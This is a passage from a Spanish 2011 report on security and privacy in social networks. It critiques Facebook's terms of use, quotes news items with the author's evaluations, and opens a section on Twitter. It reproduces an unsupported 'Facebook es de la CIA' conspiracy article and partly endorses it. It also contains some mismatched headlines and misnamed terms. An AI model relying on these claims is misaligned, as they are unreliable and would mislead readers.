Por lo que podemos leer, parece razonable que Facebook no se responsabilice de las posibles
pérdidas que puedan tener sus anunciantes o desarrolladores de aplicaciones. Pero lo que
parece bastante abusivo, es el hecho de que no garanticen que sea seguro, es decir, que si
Facebook no es seguro, cuando nosotros configuramos todas nuestra seguridad en Facebook
para que tales personas no puedan ver datos que no queremos, no estamos haciendo nada,
porque al fin y al cabo si hay fallos de seguridad, la red social no se responsabilizará de ellos.
Página 316
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
18. Otros
Es decir, que si ellos incumplen parte del contrato, nosotros seguimos atados a él, a pesar de
que ellos lo han incumplido, pero si nosotros incumplimos parte del contrato, Facebook tiene
derecho a acabar con la relación que tiene con nosotros cuando lo desee, por lo que hemos
leído anteriormente.
Página 317
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Puntos a favor
Algunas de las cláusulas velan por la seguridad de los usuarios y suenan bastante razonables:
3. Seguridad
Esta cláusula ésta bien ya que promueve la autenticidad del usuario y los datos.
Es correcto que los usuarios menores de 13 años no puedan utilizar la red social (aunque
podrían ser capaces de falsificar la fecha de nacimiento y registrarse en la red) ya que se
podrían verse involucrados en actos de pornografía infantil o acoso. De hecho el límite de
edad según determinados países es incluso demasiado pequeño. El Facebook para menores
de edad debería estar tutelado por los padres de esos menores.
Página 318
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
En este punto se intenta proteger los datos de carácter personal de los usuarios. Se comenta
que no se recopilará ningún tipo de información privada sin consentimiento del usuario y que
se facilita la eliminación o desconexión de la aplicación. También podemos ver que Facebook
puede limitar el acceso a los datos de los usuarios si lo desea.
En el punto “13. Enmiendas” parece vemos una cláusula por parte de Facebook bastante
favorable a los usuarios y anunciantes, aunque parece que el número de personas es
excesivamente elevado para poder crear una queja real en la red.
13. Enmiendas
Página 319
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.2.8. Noticias
Vamos a ver y analizar algunas noticias interesantes referentes a la red, tanto de cómo ha
evolucionado esta a lo largo de los años, como noticias referentes a aplicaciones o
relacionadas con la privacidad y los términos de uso de la red social.
Facebook, the most successful start-up of the last decade, is only six years old,
and an initial public offering is still a way off.
But a number of Facebook‘s early employees are giving up their stable jobs, free
food and laundry service to build their own businesses. Many of them are leaving
as wealthy, either on paper or after cashing in their ownership stakes to do what
they say they like best: start companies.
Dustin Moskovitz, 26, who co-founded Facebook with his Harvard roommate Mark
Zuckerberg, left his job on Facebook‘s technical staff to create Asana, which
makes software that helps workers collaborate.
Another Facebook co-founder, Chris Hughes, also 26, has started Jumo, a social
network for ― p eople who want to change the world. ‖
Dave Morin, formerly the senior platform manager, is building Path, a still-
secretive venture, while Adam D‘Angelo, who was Facebook‘s chief technology
officer, and Charlie Cheever, another senior manager, set off in 2008 and 2009
respectively to start Quora, a question-and-answer site. More than half a dozen
start-ups can trace their origins to Facebook alumni.
The departures follow a familiar pattern among other Silicon Valley successes like
Yahoo, eBay and Google. After amassing fortunes, early employees start walking out
the door.
(...)
Evaluación
Algo pasa en Facebook cuando los trabajadores iniciales abandonan la empresa para
montarse sus propios negocios, quizá el negocio de las nuevas tecnologías es muy jugoso para
estos creadores o quizá el ambiente de trabajo no es el adecuado en la empresa.
Página 320
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Tres de cada cuatro internautas repiten la contraseña en redes sociales y correo (20
minutos)
20 MINUTOS.
Tres de cada cuatro internautas repiten la contraseña en redes
sociales y correo.
Fuente: 20 MINUTOS.ES / EUROPA PRESS.
Fecha: 19.Sep.2010 - 16.36 h.
Web:http://www.20minutos.es/noticia/816300/0/contrasena/correo/facebook/.
― U n nuevo estudio sobre las contraseñas que suelen emplearse en Internet revela
que el 75% de las personas (tres de cada cuatro) usan la misma clave de acceso
para sucorreo electrónico que para la red social (especialmente Facebook yTuenti)
que utilizan, algo que hace más vulnerable su seguridad frente a amenazas
externas, que van desde el robo de datos personales hasta el uso de la cuenta de
correo o de la red social por otros para enviar spam o malware.
Este informe, elaborado por la empresa especializada en seguridad informática
BitDefender, y de la que se hacen eco en Portaltic, señala, también, que más de
250.000direcciones decorreo electrónico, nombres de usuario y contraseñas, pueden
ser encontrados con bastante facilidad en Internet a través de comentarios, blogs,
plataformas de colaboración 'torrents' u otros canales.
Estos datos siguen siendo válidos en un 87% de los casos a día de hoy. El consejo
más extendido entre empresas dedicadas a la seguridad informática es, en primer
lugar, cambiar la contraseñacada dos o tres meses.
Usamos contraseñas poco seguras
Hace un año, conocíamos un estudio relativo a las contraseñas usadasen uno de los
servicios de correo electrónico más usados, Hotmail. Las conclusiones a las que se
llegaban eran: por un lado, que la contraseña más empleada era '123456' y, por
otro, que las alfanuméricas (las más recomendadas para dotar de seguridad una
cuenta) tan sólo eran usadas por un 6% de los usuarios. ‖
Evaluación
Como vemos en la noticia, el uso de la misma contraseña para todas nuestras redes sociales
incrementa la inseguridad ya que si alguien es capaz de acceder a una red social podrá acceder
a todas las demás, además con el mismo correo electrónico en todas.
Esto por un lado parece inseguro pero por otro lado se parece bastante a la forma de registro
que pretende Open ID, en donde se unifican todas las autenticaciones de nuestras Web en una
sola contraseña y usuario de Open ID.
Página 321
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
LA RAZÓN.
Facebook llegó a los 500.
Fuente: LA RAZÓN.
Fecha: 22.Jul.2010 - 10:39h.
Web:http://www.larazon.com.ar/interesa/Facebook-llego_0_151500089.html
NUEVA APLICACIÓN
De todos modos, la red social aprovechó el festejo para lanzar la aplicación
Stories (Historias) en la que los usuarios podrán contar sus anécdotas en relación
al impacto que tuvo Facebook en sus vidas.
"Estamos lanzando una nueva aplicación donde pueden compartir su propia historia y
leer cientos de otras personas, clasificadas por temas y lugares de todo el
mundo", indicó ayer Zuckerberg.
"En vez de centrarnos en las cifras, queremos que la gente de todo el mundo
escuche estas historias y queremos que cuentes tu propia historia", añadió.
Zuckerberg enumeró algunos ejemplos de esta nueva aplicación, entre los que están
la historia de Ben Taylor, un estudiante de 17 años que logró reconstruir un
antiguo teatro de Kentucky a través de una campaña lanzada en Facebook, o el del
primer ministro danés, Anders Fogh Rasmussen, que organizó un encuentro con sus
100 fans en Facebook para correr juntos. ‖
Evaluación
Como vemos la red social va más y más en aumento pudiendo llegar de 3 a 5 años, según su
creador Mark Zurckerberg, a 1.000 millones de usuarios.
Página 322
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
ECODIARIO.ES.
Facebook corrige su cláusula sobre derechos tras la polémica.
Fuente: EcoDiario.
Fecha:18.Feb.2009 - 11:52h.
Web:http://ecodiario.eleconomista.es/internet/noticias/1042909/02/09/Facebook-corrige-
su-clausula-de-contenidos-tras-la-polemica-de-derecho-perpetuo-sobre-ellos.html
La popular red social Facebook, una de las más importantes del mundo con 175
millones de usuarios, se enfrenta a una nueva polémica por su política de
privacidad. El portal añadió una cláusula por la que informaba a los usuarios de
que cedían sus contenidos -vídeos, fotos, textos- de forma "perpetua". Tras el
aluvión de críticas, Facebook ha vuelto a las condiciones de uso anteriores.
De todos modos, Mark Zuckerberg escribe que han decidido volver "a las
condiciones de uso anteriores", mientras resuelven los problemas que les han
hecho llegar los usuarios con sus quejas.
LA POLÉMICA
Hace un par de semanas, Facebook revisó las condiciones de uso de su red social.
Esta noticia cayó como una bomba en la comunidad de blogers, que se hicieron eco
de la nueva política de privacidad de la popular red social.
Anteriormente, Facebook ya se reservaba el derecho a ejercer control sobre los
contenidos pero con este cambio, lo hacía de forma "irrevocable", "perpetua" y con
"licencia mundial". Antes, si un usuario borraba un contenido, el portal perdía el
derecho sobre éste.
Además, con el cambio en las condiciones, Facebook advertía que podría utilizar de
múltiples maneras los datos: "usarlos", "copiarlos", "publicarnos",
"almacenarlos", "retenerlos", "publicitarlos", "transmitirlos", "escanearlos",
"cambiarles el formato", "modificarlos", "editarlos", "traducirlos" o
"adaptarlos", entre otras cosas. Y todo eso de forma "perpetua".
VUELTA ATRÁS
Tras las quejas recibidas y el malestar generado en los usuarios, Facebook ha
vuelto a las condiciones de uso anteriores, por lo menos mientras revisa los
problemas que se plantearon con la modificación anterior. Además, para
tranquilizar, Mark Zuckerberg -el director ejecutivo de la red social- recalcó que
nunca se usará la información fuera del servicio Facebook. ‖
Página 323
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Evaluación
Los términos de uso y la política de privacidad de esta red siempre son temas de debate. Es
difícil para un usuario aceptar siendo consciente que sus datos personales e información que
añadimos a la red sea propiedad exclusiva de Facebook y que lo haga de manera permanente
pudiendo hacer con estos datos multitud de cosas como nos dice en el artículo "usarlos",
"copiarlos", "publicarnos", "almacenarlos", "retenerlos", "publicitarlos", "transmitirlos",
"escanearlos", "cambiarles el formato", "modificarlos", "editarlos", "traducirlos" o "adaptarlos".
A pesar de las críticas que recibe Facebook, si buscamos en los términos de uso o en su política
de privacidad la palabra perpetuo/a no aparece en ningún lugar del documento, por lo que
este tipo de cláusulas han sido eliminadas debido a las duras críticas que recibe la red social
referentes a la privacidad. En los términos de uso se dice que la información puede
permanecer en servidores de bakcup un determinado tiempo, pero no leemos en ningún sitio
que esta información puede permanecer de manera infinita en la red.
Página 324
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Facebook es de la CIA
WALTER GOOBAR.
Facebook es de la CIA.
Fuente: Walter Goobar.
Fecha: 8.Jun.2008.
Web:http://www.waltergoobar.com.ar/frontend/contenido/tema.detalle.php?noticiaId=402
El popular sitio con 70 millones de usuarios está financiado con capital de riesgo
de la Agencia Central de Inteligencia que espía a todos los usuarios y recluta sus
agentes a través del portal.
Aunque se presenta como un inofensivo sitio Web de redes sociales, que tiene como
finalidad facilitar las relaciones interpersonales, el portal Facebook que reúne a
más de 70 millones de usuarios a nivel mundial es en realidad un experimento de
manipulación global. El popular Facebook es una sofisticadaherramienta financiada
por la Agencia Central de Inteligencia, CIA que no sólo la utiliza para el
reclutamiento de agentes y la recopilación de información a lo largo y ancho del
planeta, sino también para montar operaciones encubiertas. La más reciente y
exitosa fue la movilización internacional contra las Farc, lanzada desde Facebook
a comienzos de este año.
En teoría, Facebook es una herramienta de comunicación social que permite
contactar yarchivar las direcciones y otros datos de los amigos y familiares que
conocemos. Pero también constituye una mina de informaciones para los servicios de
inteligencia que explotan estos datos, y que gracias a Facebook, saben todo sobre
sus usuarios.
Lo que no saben es que esos datos van a parar directamente a los discos duros de
las computadoras de la Agencia Central de Inteligencia de los EEUU.
Página 325
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Aunque el proyecto fue concebido por Mark Zuckerberg, la cara real detrás de
Facebook es Peter Thiel, inversor de capital de riesgo y cofundador y presidente
del sistema de pago en línea PayPal.
Thiel dice que PayPal demuestra que no sólo se puede encontrar valor en objetos,
sino también en las relaciones entre los seres humanos.
En realidad, PayPal es una manera de mover dinero alrededor del globo sin
restricciones, saltándose todos los controles de divisas".
Otro de los personajes detrás de Facebook y de Thiel es René Girard, un gurú de
Stanford, que sostiene que el comportamiento humano funciona por deseo mimético,
un concepto cada vez más utilizado en operaciones de inteligencia.
Girard afirma que la gente se mueve como un rebaño y se copia una a otra sin mucha
reflexión. Para Thiel, el objeto de deseo es irrelevante. Todo lo que se necesita
saber es que los seres humanos tienden a moverse en manada.
ESPIA SE BUSCA
Desde diciembre de 2006, la CIA utiliza Facebook para reclutar nuevos agentes.
Al igual que otras empresas u organizaciones sin fines de lucro, la incursión de
la agencia de espionaje en Facebook es parte de una nueva estrategia. En otros
organismos gubernamentales existen estrictas regulaciones federales que guían el
reclutamiento y contratación, pero la CIA es una agencia exenta, lo que significa
que tiene su propia autoridad de contratación y no es auditado.
"No es necesario obtener ningún tipo de permiso para poder incluirnos en la red
social", dice la CIA.
DOLARES MARCADOS
El portal vale cientos de millones de dólares y fue creada con dinero de Greylock
Venture Capital, un fondo de inversión que tiene un fuerte vínculo con la CIA.
La más reciente inyección de capital a Facebook -27,5 millones de dólares- fue
liderada por Greylock Venture Capital. Uno de los socios de Greylock es Howard
Cox, que –según The Guardian-, pertenece nada menos que el ala de inversión en
capital de riesgo de la CIA.
Creada en 1999, su misión es la de "identificar y asociarse con compañías que
estén desarrollando nuevas tecnologías para ayudar a proveer soluciones a la
Agencia Central de Inteligencia".
Página 326
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
UN CASO TESTIGO
Una minuciosa investigación realizada por el periodista Pascual Serrano del diario
digital Rebelión, revela como Facebook fue utilizado para armar una campaña
internacional contra las Fuerzas Armadas Revolucionarias de Colombia (Farc).
El 4 de febrero se celebró en todo el mundo una movilización contra las Farc. Los
medios destacaron la espontaneidad de la iniciativa, supuestamente originada desde
Facebook al que presentaban como una red social para los estudiantes.
Los medios insistieron que todo partía de ― un ingeniero civil de 33 años
reconvertido en informático y afincado en la ciudad colombiana de Barranquilla ‖ .
La izquierda colombiana, organizaciones de Derechos Humanos y familiares de
retenidos por las Farc criticaron duramente esa movilización a la que calificaron
de guerrerista y partidista porque negaba la posibilidad de una salida dialogada
al conflicto, ignoraba los crímenes cometidos por los paramilitares y el ejército
y apostaba por una solución exclusivamente militar al gusto del gobierno de Alvaro
Uribe, los sectores militares, las empresas de armamento y del gobierno de Estados
Unidos.
Entre los grupos de usuarios de Facebook hay títulos elocuentes: ― Un millón de
voces contra las Farc ‖ (130.000 inscriptos), ― Mil personas que odian a Hugo
Chavez ‖ (1.300 abonados) y ― Yo también quiero ver muertos a los de las Farc ‖
(8.200 usuarios), lo que da idea de su línea ideológica en lo referente a
Colombia.
Facebook recuerda a una novela de John Le Carré en la que detrás de los títeres
están los titiriteros.
Evaluación
Es cierto que parte del capital de Facebook pertenece a “amigos” de la CIA, pero decir que
Facebook es única y exclusivamente un instrumento de manipulación es algo arriesgado, aún
así, no cabe duda que pueda ser como base de datos en investigaciones por parte de la CIA u
otros organismos estadounidenses.
Si esto implica que la red social va ser útil para coger a terroristas de las grandes asociaciones
mundiales de terrorismo como las Farc y Al-Qaeda o en el caso de España la ETA no hay
problema en ceder los datos personales de la red a las organizaciones policiales del planeta,
pero hasta que punto analizan únicamente los perfiles de personas relacionadas con el
terrorismo o “establecen perfiles psicopolíticos y cuadros de contactos de cada usuario” como
se nos dice en el artículo.
Página 327
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
EL PAIS
Facebook tuvo que cerrar por manejar mal un fallo en su
sistema.
Fuente: El País.
Fecha: 24.Sep.2010.
Web:
http://www.elpais.com/articulo/internet/Facebook/tuvo/cerrar/manejar/mal/fallo/sistema/
elpeputec/20100924elpepunet_1/Tes
La red social más popular, con 500 millones de usuarios en el mundo, estuvo
inaccesible ayer durante más de dos horas afectando a miles de internautas.- El
intento "desafortunado" de solucionar un error de su sistema causó el colapso de
la base de datos.
¿Intentaste ayer noche (sin éxito) comunicarte con tus amigos en Facebook,
escribir una actualización o utilizar el botón de "me gusta" desde cualquier
página? No eras el único, ni se trataba de un problema de tu servidor. Miles de
internautas que pretendieron acceder a la red social más popular (500 millones de
usuarios en todo el mundo) se encontraron en la misma situación entre
aproximadamente las 20.30 y las 23.00, hora peninsular española: frustrados ante
una pantalla en blanco con el mensaje "Invalid URL" (dirección no válida). Se
trataba, según Facebook, que pidió después disculpas dentro de la propia
plataforma, "de la peor avería en cuatro años". El intento "desafortunado",
aseguran, de arreglar un error de su sistema colapsó las bases de datos y tuvieron
que cerrar la red.
El espacio virtual donde los internautas pasan varias horas al día conversando y
compartiendo información (con 10 millones de usuarios activos sólo en España) no
funcionaba, al tiempo que los mensajes inundaban la red de microblogging Twitter.
Muchos twitteros alertaban del problema, reproducían la leyenda del error,
ironizaban o hacían chistes sobre la situación. Desde: "Última hora. Facebook está
caído. La productividad sube, Estados Unidos sale de la recesión" (uno de los más
reenviados, por cierto), a "creo que puedo volver a mi vida ahora... después de
este tweet (mensaje)", pasando por "veo más gente por la calle, es porque Facebook
no funciona". Alguno recordaba que era el segundo día consecutivo que la red
fundada por Mark Zuckerberg en Harvard experimentaba problemas. El volumen de
mensajes enviados convirtió a Facebook y a los mensajes de error en la página de
inicio en trending topics mundiales.
Página 328
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Una vez solucionado el problema, uno de los ingenieros de Facebook colgó un largo
texto tratando de explicar el fallo: "El defecto principal que causó que la avería
fuese tan grave fue un manejo desafortunado de un error. Un sistema automático
para verificar valores de configuración acabó causando mucho más daño que lo que
arregló", escribía en la madrugada de ayer (por la tarde en la costa Oeste de
Estados Unidos) Robert Johnson. En la nota, el ingeniero explica que Facebook hizo
un cambio para intentar arreglar una copia de configuración que era
sistemáticamente catalogada de no válida. Los usuarios la detectaban y trataban de
arreglarla enviando una solicitud a la base de datos. Aunque el fallo se hubiese
solucionado, la persona no llegaba a saberlo por un problema añadido de caché, con
lo que las peticiones y los envíos se multiplicaban. "Entramos en un bucle que
imposibilitó que las bases de datos se recuperaran". La solución, señala el
ingeniero, fue desconectar Facebook para detener la avalancha sobre los servidores
y que se recuperaran. Robert Johnson finaliza diciendo que han desconectado el
sistema automático que causó la caída y que están buscando maneras alternativas de
manejar la incidencia. "Queremos que sepáis que nos tomamos muy en serio el
funcionamiento y la fiabilidad de Facebook", concluye.
La avería de este medio social se produce sólo días después de que miles de
usuarios de Twitter sufrieran un ataque por un virus que enviaba mensajes a otros
internautas sin querer o redireccionaba a diferentes Webs, incluyendo
páginaspornográficas.
Evaluación
Como todo sistema informático Facebook también tiene fallos de seguridad, parece imposible
que Webs como Facebook o Google se averíen, pero es así, así que viéndolo así, ¿quién nos
asegura que nuestra información está segura en los servidores de Facebook? Es decir, no solo
nos tenemos que preocupar de que la propia plataforma se apropie de nuestra información,
sino de que por fallos de seguridad, terceras personas lo hagan. Parece que en Internet ningún
dato está seguro.
Página 329
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
20 MINUTOS.
Un agente de policía es despedido por criticar su trabajo en
la red social Facebook.
Fuente: 20 MINUTOS.ES / EUROPA PRESS.
Fecha: 26.Sep.2010 - 10.17 h.
Web:http://www.20minutos.es/noticia/822885/0/policia/despedido/facebook/.
No es el primer caso que conocemos. A Dan Leona le despidieron del trabajo de sus
sueños por un comentario en Facebook, a Kimberley Swann le ocurrió lo mismopor
criticar su trabajo, un seguro dejó de pagar la baja por depresión a una joventras
ver sus fotos en esta red social, un sargento de Policía fue investigado por
unasfotos junto a unas jovencitas... y así, varios ejemplos, al que hay que sumar
esta semana el caso del agente de Policía Carl Boulter, despedido por hablar mal de
su trabajo en esta Web.
Evaluación
Son múltiples los casos de gente que pierde su trabajo debido a estas redes sociales. Parece
que no se debe mezclar la red social con la vida laboral, ya que nada es privado en Internet.
Aunque nuestro perfil sea privado como el de Carl, siempre va existir algún agujero para
acceder a nuestra información, por lo que comentarios, fotografías, videos, etc. siempre
pueden jugar en nuestra contra. El que Facebook se haga cada vez más popular, parece que
atenta contra nuestra libertad de expresión y el poder decir abiertamente lo que pensamos en
Internet, si no queremos perder nuestro trabajo o yendo más lejos, nuestra familia, hoy en día
no es posible, algo parecido a lo que puede ocurrir en la vida real.
Página 330
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
El ladrón más torpe del mundo anuncia sus hazañas por Facebook
TELECINCO.
El ladrón más torpe del mundo anuncia sus hazañas por
Facebook.
Fuente: INFORMATIVOS TELECINCO.
Fecha: 27.Sep.2010 - 08.53h.
Web:http://www.telecinco.es/informativos/internacional/noticia/100027548/El+ladron+mas
+torpe+del+mundo+anuncia+sus+hazanas+por+Facebook.
Es conocido por todos como '¿Dónde está Wally?' y considerado por muchos como el
peor ladrón del mundo. Ryan Homsley decidió jactarse de sus hazañas en Facebook y
publicó un mensaje en la red social anunciado que "ahora soy ladrón de bancos". A
la policía le costó poco seguirle la pista y detenerle.
Ilustración 102. Ryan Homsley publicó como foto de perfil una imagen de las cámaras de seguridad del banco que robó. Foto: Facebook.
Ryan Homsley, de 29 años de edad y apodad '¿Dónde está Wally?' por su parecido con el
personaje de cómic, fue detenido después de publicar un mensaje en la famosa red social
que decía "ahora soy ladrón de bancos", según informa el diario británico Dailly Mail.
El delincuente, además, decidió jactarse de sus hazañas y colgó en su perfil una foto
del circuito cerrado del banco que intentó robar en el que se le ve en el mostrador del
banco, con un jersey de rayas rojas y con unas gafas gruesas.
Homsley no escatima en detalles y cuenta que les dijo a los trabajadores del banco de
Tualatin, cerca de Portland, Oregon, que había una bomba.
Después del atraco, la policía encontró en la sucursal un mochila y una caja, pero
resultaron ser inofensivos.
Horas después del atraco de los mensajes comenzaron a aparecer en la página de Facebook
de Homsley atribuyéndole la responsabilidad por el delito.
Otra de las ideas que tuvo el delincuente fue colgar como imagen de perfil la
fotografía de las cámaras de vigilancia del banco que se habían remitido a los medios
de comunicación por la policía para que colaboraran con la detención del delincuente.
Según informa el diario británico, Homsley asegura en su perfil de Facebook, que hace
esto porque necesita dinero para comprar medicamentos. Al parecer, este hombre es
diabético y está desesperado por conseguir un tratamiento médico.
Ahora, dos días después del atraco, permanece detenido y recibiendo tratamiento
médico en el hospital.
Página 331
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Evaluación
Un caso parecido a la anterior noticia. En este caso el protagonista no pierde su trabajo pero
acaba en comisaría.
Página 332
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
What makes Mark Zuckerberg run? In ― The Social Network, ‖ David Fincher‘s fleet,
weirdly funny, exhilarating, alarming and fictionalized look at the man behind the
social-media phenomenon Facebook — 500 million active users, oops, friends, and
counting — Mark runs and he runs, sometimes in flip-flops and a hoodie, across
Harvard Yard and straight at his first billion. Quick as a rabbit, sly as a fox,
he is the geek who would be king or just Bill Gates. He‘s also the smartest guy in
the room, and don‘t you forget it.
The first time you see Mark (Jesse Eisenberg, firing on all cylinders), he‘s 19
and wearing a hoodie stamped with the word Gap, as in the clothing giant, but, you
know, also not. Eyes darting, he is yammering at his girlfriend, Erica (Rooney
Mara), whose backhand has grown weary. As they swat the screenwriter Aaron
Sorkin‘s words at each other, the two partners quickly shift from offline friends
to foes, a foreshadowing of the emotional storms to come. Soon Mark is back in his
dorm, pounding on his keyboard and inadvertently sowing the seeds of Facebook,
first by blogging about Erica and then by taking his anger out on the rest of
Harvard‘s women, whose photos he downloads for cruel public sport: is she hot or
not.
( ― The Social Network ‖ opens the 48th New York Film Festival on Friday and opens
in theaters next Friday.)
Although the names have remained the same, ― T he Social Network ‖ is less of a
biopic of the real Mr. Zuckerberg than a gloss on the boot-up, log-on, plug-in
generation. You don‘t learn much about him other than the headlines, beginning
with Facebook‘s less-than-humble start in 2003. Despite its insistently unsexy
moving parts (software, algorithms), the movie is paced like a thriller, if one in
which ideas, words and bank books blow up rather than cars. It‘s a resonant
contemporary story about the new power elite and an older, familiar narrative of
ambition, except instead of discovering his authentic self, Mark builds a
database, turning his life — and ours — into zeroes and ones, which is what
Evaluación
makes it also a story about the human soul.
Parece ser que esta película dedicada íntegramente a la creación de Facebook no le ha
convencido a nuestro amigo Mark que dice que no se ajusta a la realidad. Cuenta la biografía
de Zuckerberg a partir del 2003 y de una manera bastante crítica hacia este, ya que está
basada en el libro “Multimillonarios por accidente” de Ben Mezrich que narra el nacimiento de
Facebook.
Página 333
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
20 MINUTOS.
Facebook abre el telón en Nueva York: The Social Network.
Fuente: 20 MINUTOS.ES / EUROPA PRESS.
Fecha: 27.Sep.2010 - 15.46h.
Web:http://www.20minutos.es/noticia/777900/0/datos/perfiles/facebook/.
Desde hace unos meses, la seguridad de la red social con más usuarios del
mundo,Facebook, está en entredicho. Por ello, unconsultor especializadoen
seguridad en Internet, ha publicado un listado de los datos de100 millones de
usuariosde la red social en los que no se habían configurado los filtros de
seguridad. Para ello ha utilizando un código de programación para analizar los
perfiles de Facebook.
Evaluación
Los datos de perfiles que se han publicado en la Internet son de perfiles que estaban
configurados como “públicos” por lo que no parece que haya ningún delito a priori. Lo que si
nos hace pensar es si algún hacker fuera capaz de acceder a las bases de datos de Facebook y
hacerse con parte de la información y la publicase en Internet, entonces, ¿para qué sirve la
configuración de privacidad de Facebook? Llegamos a la conclusión de que no existe
privacidad en las redes sociales.
Página 334
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.2.9. Referencias
Webs:
Alexa: Facebook 2 Rank. http://www.alexa.com/siteinfo/facebook.com
Línea del tiempo de la compañía. http://www.facebook.com/press/info.php?timeline
¿Qué es Facebook? http://cartuchorom.blogspot.com/2010/01/que-es-facebook.html
Facebook.com Web Site Audience Profile. http://www.quantcast.com/facebook.com
Snapshot of Facebook.com. http://siteanalytics.compete.com/facebook.com/?metric=uv
Blogs:
Facebook noticias.http://www.facebooknoticias.com/
Adicctos al Facebook.http://adictosfacebook.com/
Otras noticias:
El 30% de los jóvenes tiene más de 200 amigos en Facebook
Fuente: La tercera
Fecha: 18.Oct.2009
http://www.latercera.com/contenido/659_192936_9.shtml.
Los ocho países donde Facebook no es el “rey” de las redes
Fuente: ABC
Fecha: 27.Sep.2010
http://www.abc.es/20100927/medios-redes/facebook-paises-sinpresencia-
201009271010.html.
Sincroniza los contactos de Facebook con el IPhone.
Fuente: PC Actual
Fecha: 27.Sep.2010
http://www.pcactual.com/Zona-Practica/Trucos/Sincroniza-los-contactos-de-
Facebook-con-el-iPhone-69013.
Facebook: Solicitudes de amistad ahora ya no se pueden ignorar
Fuente: Ultima Hora
Fecha: 26.Sep.2010
http://www.ultimahora.com/notas/362404-Facebook:-Solicitudes-de-amistad-ahora-
ya-no-se-pueden-ignorar
Un grupo anarquista cibernético turco 'hackea' Facebook en español
Fuente: 20 Minutos
Fecha: 27.Sep.2010
http://www.20minutos.es/noticia/779601/0/hacker/turco/facebook/.
Un grupo anarquista cibernético turco 'hackea' Facebook en español
Fuente: 20 Minutos
Fecha: 27.Sep.2010
http://www.20minutos.es/noticia/779601/0/hacker/turco/facebook/.
Facebook cede a las presiones instalando un 'botón del pánico' para menores.
Fuente: 20 Minutos
Fecha: 27.Sep.2010
http://www.20minutos.es/noticia/762906/0/facebook/boton/panico/.
Página 335
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Página 336
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.3. Twitter
15.3.1. Introducción
“Twitter es una red de información de tiempo real motorizada por gente alrededor del mundo
que permite compartir y descubrir lo que está pasando en este momento” según nos
comentan en su Web oficial.
“Twitter pregunta "¿Qué pasa?" y hace que la respuesta se propague a través del mundo a
millones, inmediatamente”.
Al igual que Facebook ha cambiado el estilo de vida de muchas personas, también lo ha hecho
Twitter. Es una red social más aceptada en Estados Unidos que en España, pero poco a poco
se va introduciendo cada vez.
Página 337
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Según Alexa.com Twitter alcanza el puesto número 7 en el ranking de las páginas con más
número de visitas en el mundo entero y el puesto 9 en Estados Unidos. En España Twitter
alcanza el puesto 12. Recordemos que el primer puesto es para Google y el segundo para
Facebook http://www.alexa.com/siteinfo/twitter.com.
Podemos escribir tweets desde la propia Web de Twitter o desde aplicaciones ajenas, incluso
desde Facebook y Tuenti.
Se trata de una red social gratuita, que requiere previo registro. Para el registro necesitaremos
dar datos personales como el nombre, apellidos y cuenta de correo electrónico.
Se trata de un servicio de microblogging que permite enviar a los usuarios pequeñas entradas
de 140 caracteres como máximo. Las actualizaciones se muestran en nuestro perfil, y en el
perfil de la gente que ha decidido seguirnos.
Página 338
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
Según la empresa Pear Analytics, en un análisis que realizado en Agosto de 2009, el 41% de
los tweets se trataba de Pointes Babble (Palabras sin Sentido), seguido de un 33% para
Controversial (Mensajes de Conversación), un 9% para retweets, 6% para Self-promotion
(Autopromoción), 3,75% para Spam (Correo Basura) y un 3,6% para News (Noticias).
15.3.3. Historia
En marzo de 2006 Twitter se creó como un proyecto de investigación de Obvius, LCC. En un
principio se creó de manera interna para la empresa, pero posteriormente se lanzó al mercado
y poco a poco fue ganando usuarios.
El padre de Twitter es Jack Dorsey antiguo trabajador de Obvius, LCC y actual Presidente del
Consejo de Administración de Twitter, Inc. La compañía se fundó junto a Jack Dorsey por Biz
Stone y Evan Williams y se ha financiado principalmente mediante capital riego.
15.3.4. Tecnología
La tecnología que sigue Twitter es Ruby on Rails, aunque están pensando abandonar esta
tecnología debido a los problemas de seguridad actuales y desarrollarlo de nuevo basándose
en Java o PHP. Los tweets se mantienen en servidores que corren bajo software programado
en Scala y el API de Twitter es completamente libre para poder integrar Twitter en cualquier
aplicación que deseen los desarrolladores.
Página 339
Aspectos de seguridad en Web 2.0 y redes 2011
sociales
15.3.5. Críticas
El principal problema de Twitter actualmente son sus medidas de seguridad. En septiembre
de 2010 se introdujo un gusano en la red llamado Rainboww. Este gusano explota una
vulnerabilidad de Cross-Site Scripting robando las cookies de los usuarios y afecta a la gente
que accede directamente desde la Web oficial twitter.com. El gusano hace que escribamos
una cadena de caracteres a modo de tweet que nos redirigirá a una Web externa donde se
podría ejecutar código malicioso. Para más información ver la noticia “Twitter ‘se vuelve loco’
por culpa de una vulnerabilidad potencialmente peligrosa”.
Sobre todo hay que tener cuidado a la hora de acceder a Webs externas a la red, porque no
sabemos donde podrían llevarnos si no sabes de qué se trata esa Web.
